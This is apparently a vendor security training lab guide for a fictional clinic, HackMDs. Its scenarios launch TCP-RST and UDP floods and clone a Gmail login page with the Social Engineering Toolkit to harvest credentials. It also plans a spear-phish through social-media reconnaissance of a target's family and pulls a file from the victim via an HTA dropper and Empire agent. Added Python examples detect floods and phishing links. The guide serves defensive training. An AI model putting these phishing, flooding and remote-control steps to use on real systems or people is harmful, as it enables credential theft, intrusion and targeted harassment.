    • Application Layer Attacks: An application-layer attack generally requires fewer resources than a volume-based or protocol denial-of-service attack. This attack targets vulnerabilities within applications such as Apache, Windows and OpenBSD. A common version of this attack is the attacker submitting a large number of requests that appear legitimate at first, until the application becomes unavailable.

    Lab Resources for this scenario include:

    • Attacker Resource 1: Kali Linux Rolling Edition (includes tools that we can use.)

    • Target Resource 1: HackMDs DMZ server running Ubuntu

    • Defender Resource 1: Radware Defense Pro

    • Defender Resource 4: Radware Vision

    In this lab, Mr. Orange will exploit a new HackMDs Web Application used to validate invoices. If you have used a payment application on the Internet for medical invoicing and billing of services, this application might seem familiar. The new HackMDs application, however, is horribly designed and allows an attacker to enumerate all accounts and perform many other nefarious actions. In the previous scenario, you were able to exploit this application until HackMDs deployed a Radware Web Application Firewall to protect it. Now it’s time to switch to a denial-of-service attack focus.

    As the attacker, you will launch two attacks: a TCP RST flood and a UDP flood to port 80. Although stateful devices can mitigate these attacks, the goal of the flood attack you will be performing is to overwhelm a system with the number of packets per second. Radware DefensePro’s BDoS policy can defend against these attacks by monitoring the patterns associated with these events in real time and generating a real-time signature for mitigation.

    Validate Radware DefensePro Configuration + Setup Monitoring

    First, you will validate the Radware DefensePro configuration.

    Procedure


     1   

    Open the Google Chrome browser and go to https://vision.ad.hackmds.com or click the APSolute Vision bookmark. Log in using the username dcloud and the password C1sco12345.

     2   

    On the left side of the screen, you will see the APSolute Vision image. This is the centralized management system for Radware technology. Go to that image and select the down arrow. This will bring up all of the systems managed by Radware Vision. Select DefensePro_HackMDS, representing Radware’s DDoS defense tool.

     3   

    Choose DefensePro_HackMDS, and then click the Lock icon to manage the device. You should see the Power button turn red showing you can now edit the system.

    Important: 

    Do not press the Power button as that will power off the server.

     4   

    Validate the configuration: Click Configuration > Protections > Protection Policies and make sure no Protection Profiles are attached.

     5   

    Next, click the Putty icon to open a Putty session.

     6   

    In the Host Name (or IP address) field, type 198.19.10.32 and click Open.

     7   

    Log in with username admin and password C1sco12345. Once you are logged in, type system inf-stats reset.

     8   

    Type system inf-stats to view that there is very little traffic going to the target. Consider this normal traffic to the HackMDs web server. Things look fine… for now…


    TCP Flood Attack

    TCP SYN Flood is one of the oldest, yet still powerful, denial-of-service (DoS) attacks. The most common form involves sending numerous SYN packets to the victim. In many cases, the attack will spoof the source IP, meaning that the reply (the SYN+ACK packet) will not come back to the attacker. The intention of this attack is to overwhelm the session/connection tables of the targeted server or of one of the network entities on the way (typically the firewall). Servers need to open a state for each SYN packet that arrives, and they store this state in tables that have limited size. As big as this table can be, it is easy to send a sufficient number of SYN packets to fill the table, and once this happens the server starts to drop new requests, including legitimate ones. Similar effects can happen on a firewall, which also has to process and track state for each SYN packet.
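    The behavioral approach described under About BDoS Attacks, applied to floods like the SYN flood above and the RST and UDP floods this scenario launches, as an added Python example (not DefensePro's algorithm): a baseline of per-second packet counts by protocol/flag and destination port is learned from constructed normal traffic, each new second is compared against it by both packet rate and share of total traffic, and the keys that stand out on both axes become the real-time mitigation filter. The traffic figures and the thresholds are constructed for the demo.

```python
from statistics import mean, pstdev

# Constructed per-second traffic samples for the outside interface (not lab measurements).
# Each sample maps (protocol/flag, destination port) to the packets seen in that second.
BASELINE = [
    {("TCP-SYN", 80): 20, ("TCP-ACK", 80): 300, ("TCP-RST", 80): 3, ("UDP", 53): 15},
    {("TCP-SYN", 80): 22, ("TCP-ACK", 80): 310, ("TCP-RST", 80): 2, ("UDP", 53): 14},
    {("TCP-SYN", 80): 18, ("TCP-ACK", 80): 290, ("TCP-RST", 80): 4, ("UDP", 53): 16},
    {("TCP-SYN", 80): 21, ("TCP-ACK", 80): 305, ("TCP-RST", 80): 3, ("UDP", 53): 15},
    {("TCP-SYN", 80): 19, ("TCP-ACK", 80): 295, ("TCP-RST", 80): 2, ("UDP", 53): 13},
]
NORMAL_SECOND = {("TCP-SYN", 80): 23, ("TCP-ACK", 80): 320, ("TCP-RST", 80): 3, ("UDP", 53): 17}
RST_FLOOD_SECOND = {("TCP-SYN", 80): 25, ("TCP-ACK", 80): 300, ("TCP-RST", 80): 50000, ("UDP", 53): 15}
UDP_FLOOD_SECOND = {("TCP-SYN", 80): 20, ("TCP-ACK", 80): 280, ("TCP-RST", 80): 3,
                    ("UDP", 53): 14, ("UDP", 80): 80000}


def build_baseline(samples):
    """Learn, per key, the mean and standard deviation of the packet rate and the mean
    share of total traffic. Keys never seen in the baseline get zero for all three."""
    keys = set().union(*samples)
    stats = {}
    for key in keys:
        counts = [s.get(key, 0) for s in samples]
        shares = [s.get(key, 0) / sum(s.values()) for s in samples]
        stats[key] = (mean(counts), pstdev(counts), mean(shares))
    return stats


def characterize(baseline, sample, k=3.0, share_jump=0.5):
    """Return the (protocol/flag, port) keys that are anomalous in this second.

    Two conditions must both hold, mirroring the rate-plus-ratio idea: the count is far
    above its baseline (k standard deviations and at least ten times the mean, the
    latter guarding against near-zero deviations), and the key's share of all traffic
    has jumped by more than `share_jump`, so a busy but proportionate second is not
    mistaken for an attack. The constants are assumptions for the demo."""
    total = sum(sample.values())
    signature = []
    for key, count in sample.items():
        mu, sigma, base_share = baseline.get(key, (0.0, 0.0, 0.0))
        share = count / total
        rate_anomalous = count > mu + k * sigma and count > 10 * max(mu, 1.0)
        share_anomalous = share - base_share > share_jump
        if rate_anomalous and share_anomalous:
            signature.append(key)
    return sorted(signature)


def mitigation_filter(signature):
    """Translate the learned characteristics into human-readable drop rules."""
    return ["drop %s to dst port %d" % (proto, port) for proto, port in signature]


if __name__ == "__main__":
    baseline = build_baseline(BASELINE)
    for label, second in (("normal", NORMAL_SECOND), ("rst flood", RST_FLOOD_SECOND),
                          ("udp flood", UDP_FLOOD_SECOND)):
        sig = characterize(baseline, second)
        print(label, "->", mitigation_filter(sig) or "no action")
```

    The normal second produces no filter even though every counter is slightly above its mean, the RST flood yields a filter scoped to TCP RST on port 80, and the UDP flood yields one for UDP to port 80 while DNS on port 53 is left alone. That scoping is the practical value of characterizing rather than rate-limiting everything: legitimate ACK traffic to the web server keeps flowing during mitigation.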

    For this next part, you will launch a TCP Flood attack against the HackMDs web application.

    Procedure


     1   

    Go to the Kali Linux attack box. Open a terminal by selecting the terminal icon.

     2   

    Enter cd /opt/wgames/ at the prompt.

     3   

    Type ./start.sh to run wgames.

     4   

    Enter ./start.sh and then select item 5 (TCP-RST Attack).

     5   

    When the attack starts, you will not see any data outside of the tool letting you know it has started.

     6   

    Go back to the jumphost. In the open putty session, enter system inf-stats to view the impact of the attack.

    Note: 

    You should see a large amount of traffic coming in on port 1 (outside port). This represents the impact from a TCP Flood attack. This attack can take out any of the HackMDs services, including the HackMDs website.

     7   

    Go back to the Kali Linux attack box. Stop the attack by pressing Ctrl + C.


    DefensePro: Enable a BDOS Profile

    Now, you will enable a BDOS profile to protect against TCP flood and other DDoS attacks. Currently, Radware is in a monitor-only mode.

    Procedure


     1   

    Go back to the jump host. Click Vision and enable the BDOS Protection Profile in your Lab by selecting Configuration > Protections > Protection Policies.

     2   

    Double-click HackMDS-Radware.

     3   

    This will bring up the configuration page for your profile. Select Profiles on the left. In the BDoS Profile select BDOS and then click Submit.

     4   

    You should see that the protected profiles policy is now updated with BDOS. Its status should also show that it is enabled.

     5   

    Click Update Policies to activate the configuration changes.

     6   

    Go back to the attacker machine. Start the attack again (./start.sh and then select item 5 (TCP-RST Attack)).

     7   

    Go back to the Jumphost. In Vision, select Security Monitoring > Current Attack Table and you will see the attack details displayed.

    Note: 

    It might take a minute for the attack details to show in Vision. Be patient. You don’t have to refresh the page, because it will refresh on its own as the attack details start to show up.

     8   

    You can use other displays to look for the attack. Click Ongoing Attacks Monitor to bring up this display.

     9   

    You should see a B within a shield that is pulsing. This indicates an active attack is occurring. Double-click the shield with the B to see more details. Explore the different items of data about the attack. The following image is an example of the Attack-Identification Statistics graph. Explore the other views.

     10   

    Go back to the attacker machine when you are done viewing what Radware shows is being prevented. Stop the attack on the attack machine using CTRL + C.


    UDP Flood

    To start the next attack, we need to first disable the current policy that was used during the last attack scenario. This will put Radware DefensePro back in a monitor only state.

    Procedure


     1   

    Go back to the jumphost. Click the lock in DefensePro so you can make configuration changes.

     2   

    Select Configuration > Protections > Protection Policies. Double-click your policy.

     3   

    Uncheck the Enabled box, and then click Submit.

     4   

    Click Update Policies.

     5   

    Now it’s time to launch the second attack. Go back to the attacker machine. From the attack machine, in the terminal run cd /opt/wgames then ./start.sh. This time, choose option 7 wg_UDP_flood_p80.sh representing a UDP flood attack.

     6   

    Go back to the jump host and check Security Monitoring in Vision. This is found by clicking the shield and selecting Current Attack Table. Since Radware is in monitor mode, you will just see the warning message. It may take a minute for this to show up. You will also see previous attack alarms.

     7   

    Web services will now be slow in accessing hackmds.com. Go back to the attacker box and stop the attack using CTRL + C.


    DefensePro: Enable BDOS Profile and Use the AMS Dashboard

    Procedure


     1   

    Now, you will once again enable a protection policy (the BDOS policy) to prevent this type of attack. This will allow Radware to prevent this attack from impacting HackMDs services.

     2   

    To go back to the policy, click Configuration > Protections > Protection Policies. Select your policy.

     3   

    Double-click your policy. Check the Enabled box, and then click Submit.

     4   

    Click Update Policies.

     5   

    Go back to the attacker box and relaunch the attack. Use cd /opt/wgames and then ./start.sh. Choose option 7 wg_UDP_flood_p80.sh. Radware DefensePro will now mitigate the attack.

     6   

    Go back to the jumphost. Select Security Monitoring > Current Attack Table and you will see the attack details are displayed.

    Note: 

    It may take a minute for the attack details to show in Vision. Be patient. You don’t have to refresh the page, because it will refresh on its own as the attack details start to show up.

     7   

    You can once again go to Ongoing Attacks Monitor to view the B in the shield. However, let’s look at a more focused dashboard called AMS. On the right, click the AMS icon to open multiple dashboard options. Click the first option called DefensePro Monitoring.

     8   

    You will see a much more data-rich dashboard showing the attack. Notice you are being told you are “Under Attack” meaning you are seeing DDoS traffic right now. You can see the load and what is being dropped.

     9   

    Next, click the DefensePro Attacks dashboard.

     10   

    This will bring up a Traffic Bandwidth view which shows the active attack via the increase in traffic.

     11   

    When you are finished reviewing the dashboards, go back to the attacker box and stop the attack using CTRL + C.


    You have completed this short overview of using Radware DefensePro to prevent both volumetric and protocol based DDoS attacks. To learn more about Radware, visit radware.com. If you haven’t performed the web application firewall part of the Web Defense Resource and Sustainability Part 1 scenario, be sure to check that out. Stay secure!

    Congratulations! You have completed this scenario.

    Defend Identities and Prevent Password Compromise: MFA Saves the Day

    Value Proposition: Security professionals will tell you that your people will likely be the weakest link in your cybersecurity posture. Two of the most common attacks against people are social engineering and phishing. The goal of these attacks is to trick the victim into clicking something, installing malicious software, or revealing the victim’s password. Rather than focusing on making passwords longer and more complex, it is best practice to have users validate their identity upon connection to any resource with sensitive data, using multifactor authentication that identifies you by something you have, something you know or who you are. Cisco Duo can provide a simple method to address authenticating users, as well as prevent threats from stolen passwords or account takeover. Cisco Duo is a key component to meeting the industry’s latest Zero Trust guidelines.

    In this lab, Mr. Black has assigned you, Miss Red, to create a social engineering attack campaign against HackMDs.

    Your goal is to clone a trusted resource and trick the victims to access the fake resource using their real passwords.

    When you clone a website, you will be able to launch various phishing methods to trick the victim to log into the fake website.

    Note: You can use the same approach on your real network to test your organization’s ability to defend against social engineering / phishing attacks. Learn more about the current state of phishing attacks from NIST.gov at https://www.nist.gov/news-events/news/2018/06/youve-been-phished
    Important: You must register your Duo account before the activation link expires or you won’t be able to perform the second part of this lab.

    The second part of this lab responds to the increased number of phishing attacks seen against HackMDs with a new deployment of Cisco Duo. Industry best practice for user security is not only to enforce multifactor authentication, but to ensure that every application and internal resource that contains sensitive information validates that the user is who they say they are and that the user is authorized for access.

    If a user’s password is stolen through phishing, the attacker will not be able to access any sensitive systems since they will not be able to provide the Cisco Duo one-click validation. This is a much better approach than increasing password complexity and shortening password expiration, which leads to a negative impact for work productivity, as users fumble with creating new, complex passwords, along with the fact that this allows passwords to be vulnerable to social engineering attack.

    Cisco Zero Trust architecture

    The following image showcases Cisco’s Zero Trust architecture. This lab will focus on addressing the user access vulnerability, also known as “securing the workforce”.

    Other tools that can help against phishing attacks are Cisco Umbrella, which prevents connecting to malicious sources, Cisco Tetration which monitors data center workflows, Cisco AMP which can detect if malware is placed on an endpoint and Cisco Stealthwatch, which can detect insider threats. Check out these tools in other Cyber Resilience Platform Modules!

    Outcome

    Learn how to deliver social engineering and phishing attacks using the Social Engineering Toolkit (SET). Gain experience deploying Cisco Duo and protecting users from account takeover and password compromise. Protect Splunk by enhancing authentication with Cisco Duo.

    Lab Resources

    • Attacker Resource 1: Kali Linux Rolling Edition

    • Attacker Resource 2: The Social Engineering Toolkit (SET)

    • Defender Resource 1: Jumphost SOC administrator workstation

    • Defender Resource 2: Cisco Duo

    • Defender Resource 3: Cisco Duo Mobile Application

    • Defender Resource 4: Splunk

    • Defender Resource 5: You--the person running this lab who has your mobile phone ready

    Mr. Black has assigned you, Miss Red, to harvest credentials from HackMDs users using social engineering and phishing techniques. In order to accomplish this, you will use the Social Engineering Toolkit (SET) to clone a source that is used by the HackMDs staff. One easy target would be Google Mail (Gmail) since it is likely somebody within the organization has a Gmail account. You will use a phishing attack to have a victim log into a Gmail website, which will capture their username and password. Once you own the Gmail account, you will be able to launch an internal social engineering campaign emailing from the compromised Gmail account.

    Develop the Attack

    Procedure


     1   

    Connect to the Kali Linux server.

     2   

    Start a terminal session: Click the terminal emulator icon at the bottom of the desktop.

     3   

    Type the command setoolkit to start up the Social Engineering Toolkit. You may have to answer “yes” to agree to the terms of service (basically saying you will only use this for pretend evil, aka penetration testing).

     4   

    You will see the main social engineering attack (SET) menu. Type 1 to enter the Social-engineering Attacks menu, and then click Enter.

     5   

    In the next menu, type 2 to select Website Attack Vectors, and then click Enter.

     6   

    In the next menu, type 3 to select the Credential Harvester Attack Method menu, and then click Enter.

     7   

    Type 3 to select the Custom Import option, and then click Enter.

    Clone a trusted website: At this point, we want to trick the victim into believing the cloned site is the real version. This is where creativity comes into play. At this point, you can clone any website you like. For our example, we will clone the Gmail login page.

     8   

    When you are asked to identify the source address for the cloned system (the fake website), use your attacker system. Type 198.18.133.6, and then click Enter.

    As previously stated, for our attack example we will clone the Google Mail website, but you are welcome to clone another website. We are using Gmail since the attacker can assume somebody will have a Gmail account. You will need to download the website.

     9   

    To open a browser, go to the bottom of your desktop and click the ZAP icon.

     10   

    Go to the website you want to clone. For our example, we will go to gmail.com and click until we see the login page. Once you see the page you want to clone, right-click the page and select “Save Page As”. The next image shows right-clicking the login page for accessing Gmail:

     11   

    Choose the root directory and you will see a folder called “CloneWebsites”. Choose to save your website in that folder. You will need to rename the file you are saving to index.html. Also make sure it is saved as a complete website. Click save.

     12   

    Now, go back to the terminal to finish configuring your attack within SET. Next, you need to enter the path of the website that is being cloned. The file must be named index.html, as explained by SET. For our example, we put that file in /root/CloneWebsites/, so enter that path. Make sure the path starts and ends with a “/”.

     13   

    You will be asked to copy the index.html or entire folder. Choose 2 to copy the entire folder.

     14   

    Next, you are asked about the URL of the website you are cloning. Gmail uses https://accounts.google.com so we will use that. This will be different if you are using a different website. Click enter.

     15   

    You will see a prompt explaining how to use this attack. Press Enter to confirm that you understand.

    Once complete, the Gmail website will be cloned and stored on the attacker system, whose IP address is 198.18.133.6. You will see a prompt indicating that the fake website is in listening mode. This means that if somebody interacts with the website, you will capture any information they submit. Don’t close the window! Leave this page up.


    Test the Attack

    Now that you created the fake website, you need to test it.

    Procedure


     1   

    From your web browser, go to 198.18.133.6.

    You will see the fake Gmail website, or whatever website you cloned. What is key for our example is that the login screen appears exactly as you would expect to see it. The only major difference will be the IP address in the address bar, but many untrained users will not notice this. With the right social engineering tactic, you could trick the user into logging in to this website.

     2   

    Pivot back to the opened terminal to see captured data from anybody that interacts with the cloned website.

     3   

    When you are done, press Ctrl+C to generate a report of the data that was collected.

    Note that the key to this attack is getting your victim to believe this is the real Gmail site, or forcing a redirect from the real Gmail to this fake version. One option is a phishing attack. You could create an email stating you have a new message from somebody important, followed by CLICK HERE to access your message. If the victim clicks the link, they will be directed to the fake Gmail login screen. We performed an email-based phishing exercise in the ransomware module.

    Feel free to test cloning other websites and accessing the fake website from other systems such as the Jump host. Here is an example of cloning www.thesecurityblogger.com and accessing the fake version of this website from the Jump host while it’s hosted from the attacker server (198.18.133.6).

    Let’s consider another approach, similar to our advanced ransomware lab where we planted a remote access tool (RAT), also known as a backdoor. Once you have compromised the system, you could redirect requests for Gmail away from the real DNS answer and to your fake website. This means that any time the victim attempts to access Gmail, they will be sent to the fake Gmail, because name resolution has been poisoned with the wrong IP address for Gmail. The following example modifies a DNS entry so that attempts to access Facebook go to a different website instead of the real one. The attacker could poison as many DNS entries as desired, completely controlling what the victim is able to access. Feel free to explore SET, as it offers many other social engineering attack methods.
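    From the defender’s side, the two giveaways described above (a login page served from a bare IP address, and a victim whose name resolution has been pinned to the attacker) are both checkable. The following Python script is an added example written for this guide, not part of the lab or of SET: it tags links whose host is a raw IP or a brand lookalike, and audits hosts-file content for pinned entries. The sample links, the hosts-file text, the trusted-domain list and the brand tokens are all constructed for the example; the only value taken from the lab is the attacker address 198.18.133.6.

```python
import ipaddress
from urllib.parse import urlparse

# Domains that legitimately serve the brand's login pages (assumption for this example).
TRUSTED_DOMAINS = {"google.com", "gmail.com"}
# Brand words whose presence in an untrusted host name suggests a lookalike.
BRAND_TOKENS = ("google", "gmail")

# Constructed sample links, e.g. extracted from an email body or a proxy log.
SAMPLE_LINKS = [
    "https://accounts.google.com/signin",                # legitimate
    "http://198.18.133.6/",                              # clone served from the lab attacker host
    "https://gmailgooglelogin.io/login",                 # lookalike domain from the lab's tip
    "https://accounts.google.com.evil-example.test/",    # brand used as a subdomain elsewhere
]

# Constructed hosts-file content with two poisoned entries.
SAMPLE_HOSTS = """127.0.0.1   localhost
# pinned by an attacker with a foothold on the victim
198.18.133.6   accounts.google.com
198.18.133.6   www.facebook.com
"""


def registrable_domain(host):
    """Naive registrable domain: the last two labels (fine for .com/.io in this example)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def classify_link(url):
    """Return indicator tags for one URL; an empty list means nothing suspicious was found."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    findings = []
    try:
        ipaddress.ip_address(host)
        findings.append("raw-ip-host")      # a login page on a bare IP is the SET clone's giveaway
        return findings
    except ValueError:
        pass
    if registrable_domain(host) in TRUSTED_DOMAINS:
        return findings
    if any(tok in host for tok in BRAND_TOKENS):
        findings.append("brand-lookalike")  # brand word inside a domain the brand does not own
    if parsed.scheme == "http":
        findings.append("plaintext-http")
    return findings


def scan_links(urls):
    """Map each URL to its indicator tags, keeping only URLs with at least one finding."""
    flagged = {}
    for url in urls:
        tags = classify_link(url)
        if tags:
            flagged[url] = tags
    return flagged


def hosts_overrides(hosts_text, watched_names):
    """Return {name: ip} for watched host names that a hosts file pins to a fixed address."""
    overrides = {}
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            if name.lower() in watched_names:
                overrides[name.lower()] = ip
    return overrides


if __name__ == "__main__":
    for url, tags in scan_links(SAMPLE_LINKS).items():
        print(url, "->", ", ".join(tags))
    print(hosts_overrides(SAMPLE_HOSTS, {"accounts.google.com", "www.facebook.com"}))
```

    The registrable-domain helper is deliberately naive (it does not know about two-level suffixes such as co.uk); in a real filter you would use a public suffix list and a brand list maintained for your organisation.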


    Set Up and Test Duo

    It’s time to improve HackMDs’ authentication security using Cisco Duo, to reduce the risk from stolen passwords or compromised accounts. If an account is compromised on a Duo-protected system, the attacker will not be able to provide the Duo single-click validation, even if the attacker has a valid username and password.
    Important: Be sure you have set up the Duo account before the activation link expires. Otherwise, you will need a new lab.

    Procedure


     1   

    On the Jumphost desktop, click the green icon with the white checkmark called Demo Ready.

     2   

    On the Welcome to dCloud page, click the Activate button.

     3   

    A new browser window opens for the Duo activation process.

     4   

    On the Duo New Admin Setup page, click Get started.


    Onboard User from Your Mobile Device

    For this next exercise, we will pretend that one of your administrator team members needs access to Splunk. We will walk you through onboarding this new user. You can use the same mobile device on which you installed Duo in the previous scenario.

    Procedure


     1   

    Sign in again. You should see the login credentials are already auto populated. If not, log in with Admin and C1sco12345.

     2   

    When you log in, you will see that you need to set up two-factor authentication. Click Start setup.

     3   

    Choose a mobile device unless you are using a different device type.

     4   

    You will be asked to enter your information. If you chose a mobile phone, you will be asked to enter the number.

     5   

    Next, you will be asked the make of your mobile device. Choose and continue.

     6   

    You will be offered to install Duo or say you already have it. If you are using the same device that you previously installed Duo on, click I have Duo Mobile Installed.

     7   

    Before trying out your new login credentials, we need to create a user within Duo. Switch back to the Duo management interface on Jumphost1 and select Users from the left panel.

     8   

    Click Add User to add a new Duo user.

     9   

    Give your new user a name, and then click Add User. For our example, we will call this person labuser.

     10   

    Our last step is to associate the new user with the mobile device you used to represent the new administrator accessing Splunk. Click 2FADevices to bring up the devices known to Duo.

     11   

    Click the phone number you used for this lab.

     12   

    You will see the Duo info associated with the phone number you previously added. Click “Attach a user”. For this example, we recently deleted a user named dcloud, which is shown in the next image. Any users that are deleted remain pending for a certain time period.

     13   

    You will be asked to search for the user you created to represent your new administrator of Splunk. Type the username, select the user when it comes up. Click Add User.

    Now you will see the new user associated with the phone number as well as the admin if you used the same device. If you used different devices, it should be represented here as Duo tracks number associations to Duo accounts.

     14   

    Finally, go back and try logging into Splunk. You will be prompted to use your Duo one-click second factor after you log in with the user admin and password C1sco12345. Click any option you want to test. For example, if you choose “Send Me a Push”, you will see a notification on your phone.

     15   

    Click Approve on your mobile device and you will be logged into Splunk.

     16   

    Feel free to explore the Duo management interface, the application, and how the technology works. You can practice securing other applications within the HackMDs environment. When you are finished, you are welcome to delete the Duo application, or click the Plus sign within the Duo application and delete any accounts you no longer want to use.

    Congratulations! You have completed this scenario.


    Protect Your Applications

    Procedure


     1   

    You should now be logged into Cisco Duo as the new administrator.

     2   

    First, let’s go to the main dashboard. You will see a menu on the left. Click Dashboard.

     3   

    Now, we need to protect some HackMDs applications with Duo. Remember, Duo is all about having the application authenticate the user. Click Applications to bring up the application configuration menu. Within that page, click the “Protect an Application” button.

     4   

    Scroll down to see tons of applications that can be protected by Duo. For example, if you type Ci, you will see applications that start with Ci including Cisco and Citrix solutions.

    Since Splunk is one of our main dashboards for monitoring for threats at HackMDs, it would make sense to protect that application from an administrator’s account being compromised.

     5   

    Type splunk into the search to bring up details on protecting Splunk with Duo. Click Protect this Application.

     6   

    Observe the different keys required to integrate Duo with Splunk. These keys are your secret passwords and unique to your deployment. If you click select, it will generate a key as shown.

    Next, you need to setup Duo on Splunk.

     7   

    Click the Splunk tab within the web browser, or go to https://splunk.ad.hackmds.com:8000 and log in with the username admin and the password C1sco12345. You should see the Splunk main dashboard.

     8   

    At the top of the page, select Settings, and then go to the bottom right of the screen and click Authentication Methods.

     9   

    Observe that there are different options for user authentication. For Multifactor Authentication, select Duo.

     10   

    When the link to Configure Duo Security displays, click that link.

     11   

    Now you need to go back to your Duo manager to obtain the keys being requested by Splunk. Note that when you click the Select button to the right of a key, Cisco Duo generates your key if you haven’t already done this in the previous step which showcases the keys.

     12   

    Fill out each item within Splunk using the requested keys you generated in Duo. For our lab example, we will not modify the Application Security Key. You are welcome to create your own, or if you leave it, you will be using the key automatically generated by Splunk. You also have the option to allow user login when Duo is not available (fail open), which is what we will use for our example. In a real deployment it is recommended not to let a user log in when Duo is not available, since anyone who can make Duo unreachable would otherwise bypass the second factor.

     13   

    In the bottom right corner of the window, click Save. Splunk is now protected by Cisco Duo.

     14   

    Click Administrator, and then select Logout.


    Email Exploitation

    Value Proposition: Email continues to be the number one threat vector. This is due to multiple reasons. For example, the target is a very vulnerable one-- people! Simplicity of launching email-based attacks and availability of email targets means that email attacks can come from anywhere at any time. This lab includes a variety of scenarios you can use to teach how real-world email attack campaigns are executed. Use this lab to showcase why the security industry recommends a layered email defense strategy which includes behavior, signature, and anti-phishing features.

    The Players

    Mr. Black has hired Mr. Brown (you) to perform a sophisticated social engineering attack against HackMDS. The first stage of the attack will be to identify a worthy target, such as somebody in middle management or a director. You will learn everything you can about this target and use your research to develop a spear phishing email that looks so legitimate that your target will not only open the email, but also click any links in the body of the email.

    Background Story

    One good place to start is searching on LinkedIn using the term ‘HackMDS’ and browsing the people returned in your search. Unfortunately, LinkedIn is only returning C-level executives and not matching your target IT manager profile. You decide to check blog posts and technical articles, as IT directors occasionally publish on these resources. To find a target, you search Google using “HackMDS moves to Cloud” but get nothing. You try again, “HackMDS Cloud Computing,” nothing. “HackMDS Network Upgrade”, BINGO! You come across an article in Network Computing magazine titled “Upgrading Healthcare Networks” that was published just last year. In the article you see a quote from ‘Lawrence Peterson – Director of IT, HackMDS’. You quickly pivot back to LinkedIn and look up Lawrence Peterson, and sure enough, he still works for HackMDS. Target acquired!

    Next Step

    Now that you have a target identified, the next step will involve learning all you can about Lawrence Peterson. You start by creating a fake LinkedIn profile where you work in IT for a nearby hospital. You send Lawrence Peterson a connection request and in the note of the request you reference the article from Network Computing magazine. With the context from the Network Computing article embedded in your request, Lawrence Peterson joins your LinkedIn network.  Building upon the LinkedIn connection, you learn more about Lawrence Peterson from other social media, including family pictures that appear to include a high school age child.

    You notice a LinkedIn post from Lawrence mentioning a five-minute commute to the office, which lets you conclude which high school district he lives in. You search the public activities calendar on the Washington Union High School web site and notice there is a field trip planned to a nearby ski resort. Your investigation is done! Your attack vector will be a fake email from Washington Union High School to Lawrence Peterson, crafted to look like a permission slip for the student to attend the ski trip.

    Important: 

    Before you begin these scenarios: You must log in to Jumphost 2 and the Dr. workstation for this lab to work. Jumphost 2 represents lpeterson, who will be the target of the attack.

    Lab Resources

    • Attacker Resource 1: Kali Linux sitting on the outside network

    • Attacker Resource 2: Ubuntu Server hosting various tools for the attacker

    • Victim Resource 1: HackMDs internal IT administrator

    • Victim Resource 2: HackMDs internal doctor

    • Defender Resource 1: Cisco Secure Email (previously called Email Security Appliance)

    Spear Phishing Time!

    In this lab, Mr. Blue (you) will craft a realistic looking email to look as if it came from the target’s son’s High School. You will use a script to send this email, but you are encouraged to view the content of the script to see what it is doing before sending it.

    Procedure


     1   

    Connect to the Kali Linux system from the GUAC server: From the Kali Desktop, right-click and select Open Terminal.

     2   

    Type the following commands to list the content of the script:

    
    root@kali:~# cd /root/EmailAttack
    root@kali:~# more ./emailattack-step1.sh
    

    If you view the basic structure of the script, you will notice it uses the mutt utility to send an email to lpeterson@hackmds.com. You may also notice the script changes the muttrc file, which effectively changes the sender’s display name. After the email is sent, notice that we start the Empire tool in the background using the Linux screen utility with this command: screen -dmS empire ./empire (the -S flag names the detached session “empire”, which is the name you attach to later). We also need to start a local web server that will be used to interact with our target workstation.

    When the web server is started, it will be listening on port 9000. It is started with the command:

    python3 -m http.server 9000 &

    Note: 

    The trailing & character runs the command in the background, which frees up your terminal window prompt for future use.

     3   

    Start the spear phishing attack by running the script with following command:

    
    root@kali:~# ./emailattack-step1.sh
    

    You’ll notice the output of the script prompts you to run screen -r empire to attach to the empire session. We will revisit this terminal window later in the lab.

     4   

    In the next step we will need to switch roles to the IT administrator who is the target of the spear phishing email. Log in to the jumphost and use the Remote Desktop link on the desktop to log in to the IT Admin host with IP 198.19.30.100. Log in with username hackmds/lpeterson and password C1sco12345.

     5   

    When you have logged into the IT admin workstation, click the Outlook icon on the Windows Taskbar to start up Outlook.

     6   

    Remember, you’re acting as the target now. You see the email that you (the attacker) sent, but it appears to come from Washington Union High School, which your son attends.

    Note: 

    The mastery in this attack scenario was the social engineering research performed before the attack. The attack itself is nothing special as we are just using some generic tooling to own a target. The body of the email looks legitimate and asks you to save the attachment named WUHS-permslip.hta, which you need to save now.

     7   

    Save the attachment to whatever folder Outlook defaults to:

     8   

    Open Windows file explorer and open the WUHS-permslip.hta file by double-clicking it:

     9   

    You will see a form that appears to be a legitimate permission slip:

     10   

    Switch back to the Kali Linux host. On the terminal window from where you started the attack, you’ll notice the output of the script prompts you to run screen -r empire to attach to the empire session. Do that now with the following command:

    
    
    root@kali:~# screen -r empire
    
    

     11   

    After attaching to Empire, you should notice an active agent connected to your Empire session. The active agent will be shown in green text with a ‘+’ sign on the left. Take note of the agent name that Empire assigned to the agent. It will be an eight-character name that you will use to control the agent. Type “agents” at the Empire prompt and you will see some details on the active agent:

     12   

    Now we will use Empire to interact with the agent. Type interact <agent_name> where agent_name is the eight-character Empire agent name listed for your environment. We should now have control of the remote workstation. Next, let’s get the username of the logged in user by using the shell “whoami” command:

     13   

    Note that the whoami command output also gave us the Windows domain name (hackmds), which will prove valuable later. Let’s also use the Windows directory command to see where we are on the filesystem, which will give us an idea of where to go to find some loot! Type ‘shell dir’ to list the name of the current working directory as well as the contents of that directory:

     14   

    We can see from the output of the ‘dir’ command that there is a file named ‘Physician Training.xlsx’ as well as our dropper file in the Documents directory. Let’s use Empire to download the Physician Training.xlsx file in the hope that we can gain some intel that we can use in a later scenario to escalate this attack. Type ‘download “Physician Training.xlsx”’ (with double quotes around the filename, as it contains a space):

     15   

    We now have our loot downloaded to the Empire downloads directory. Use the Kali Linux file explorer to browse to that directory, then open the file with LibreOffice, which is an open-source office suite that can open Excel files. Click the ‘Applications’ menu in the top left of your Kali desktop, then choose ‘File Manager’:

     16   

    Within the Kali File Manager, browse to the Empire downloads directory in ‘/opt/Empire/downloads’, then browse into the directory named after your agent, then into ‘C:/Users/lpeterson/Documents’:

     17   

    Double-click the ‘Physician Training.xlsx’ file. This should open LibreOffice, which will display the contents of our loot.

    Note: 

    This file was exfiltrated from an IT administrator. It appears that there are several physicians being trained on the new cloud-based patient record system. Because they have not gone through the training, those physicians might be storing patient records locally on their workstations.


    Good job! Let’s leverage this to escalate our attack in the next scenario!
